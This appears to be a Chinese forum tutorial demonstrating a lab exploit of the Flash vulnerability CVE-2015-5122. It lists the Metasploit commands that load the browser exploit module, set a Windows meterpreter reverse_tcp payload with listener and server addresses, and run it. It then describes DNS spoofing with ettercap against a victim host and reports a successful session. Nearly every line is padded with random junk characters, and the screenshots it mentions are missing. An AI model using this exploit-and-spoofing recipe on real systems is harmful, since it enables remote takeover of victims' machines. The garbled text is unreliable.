' w# d4 m: N9 ?7 V2 D 二、cve2015-5122漏洞实例演示虚拟机
3 M. g9 L1 f/ F5 j% I
" U. t, k2 @+ `8 n8 D
3 `4 V' ]; Y( B4 b, k; i 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
$ t) D' p# F7 z. J" ~ 5 e5 G; T& E, \( [
% J/ A2 P6 r2 c7 F
search cve-2015-5122如图: 7 K J! i$ m, G, e
8 f% }! E0 N+ N) j; u$ n" X" r9 ?
0 c/ ?, \0 H) a) v) H # L2 s6 B, j/ C# W4 N8 R, P0 v, s! y% C
& j& q0 T: r) w' R9 r; M6 e9 q
% ]* f( c8 ?1 k+ U
下面我们敲如下命令:
, _ j/ I4 ]9 s5 O5 [8 t 8 \1 d. ?4 I) `$ }2 {) L& p" K3 C
) k( U% W4 T4 V) I$ W use exploit/multi/browser/adobe_flash_opaque_background_uaf ' P- K3 Y3 N0 L, h! t
1 l" k# e0 Y7 b0 I' ]9 X* e
2 L& J7 `/ j/ b set PAYLOAD windows/meterpreter/reverse_tcp
4 U6 b' {' p8 M2 G, F' J6 E; ?/ g! g; ? 5 i6 L- m$ @6 x0 j0 |) i
+ |7 K. e1 }9 e) A: T$ ^6 z
set LHOST 192.168.0.109
9 Y3 \1 ~ q- F2 |' O7 q5 c5 u& e $ z+ Q, R- p& F$ Q
5 \' y2 U, N8 g9 T y
set URIPATH / /*根目录*/
/ j0 i; L' v7 h+ u. ?' N5 c - c8 \; n a* k5 z- W
% n4 b5 Z K; N, n
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ! U: D- ]- b) C* R5 j* D, I
# J% m; H6 Y, F' g7 I3 B! u, Y
" H) S: S8 Z& o( Z3 Y) }1 ?
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 ( t: \( i- b k7 W3 N; N
! R, @5 q' @9 b- { t" X. X
. C, c( y( Z& u& i9 e) P6 R6 L 然后show options如图: 8 E. n1 Y1 `- l* a6 k( r
; j+ } ?6 Z6 u- D
! s8 l) F3 h1 Q ~$ m" p
3 \% D$ F% j* K6 c. a0 y) _+ @( M9 H
6 v) C {) j6 t; O+ k+ {9 D/ q
3 @& a5 q# M: H1 W0 t' A 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: & B8 D8 D9 j, {& A! e4 t$ k
7 ~! w# L. `% P8 _4 m) ?
# `3 U% c: j4 G" v3 _ Y+ P2 v9 `9 [1 u `7 ?8 S6 P
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 % z( j: `$ h' _$ U* L4 ^
- F7 c1 n) i$ \( w& Y0 n7 t. j7 m% d8 p: z( N }# |
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf 7 x. v+ P) M. {. a
* D. |. ~- Q \" G- H! m9 J
, c1 u& ]! V( U$ k3 u! r* S7 {
( k' f: k0 |: B9 B: d4 a! j + G+ C9 w2 s8 y' z( W, P8 [
; {3 X s- d* s3 J" m% h 成功了,这时候我们断开ettercap,如图: 6 J( N% B C4 ^+ _! ~* E/ ?
8 w. d) s; f/ Z
6 P# Z: M1 d8 z 6 w' w; ?9 J. X0 {
9 A- s$ E h) U/ w; C
4 p. b5 q1 c% k Screenshot如图: 8 |$ [; n* X2 q0 R, j1 n
1 [% ?2 r$ f3 A; o$ ?# z' |. H. O
- Z! y: y9 e }
y5 t5 E5 L1 M
8 V8 v4 v; X! N6 t" ~& p' B8 K
) ]' ~* G% C9 t3 f3 P- q6 f: R! F ! y& s5 Y, j# B0 z3 J" [
|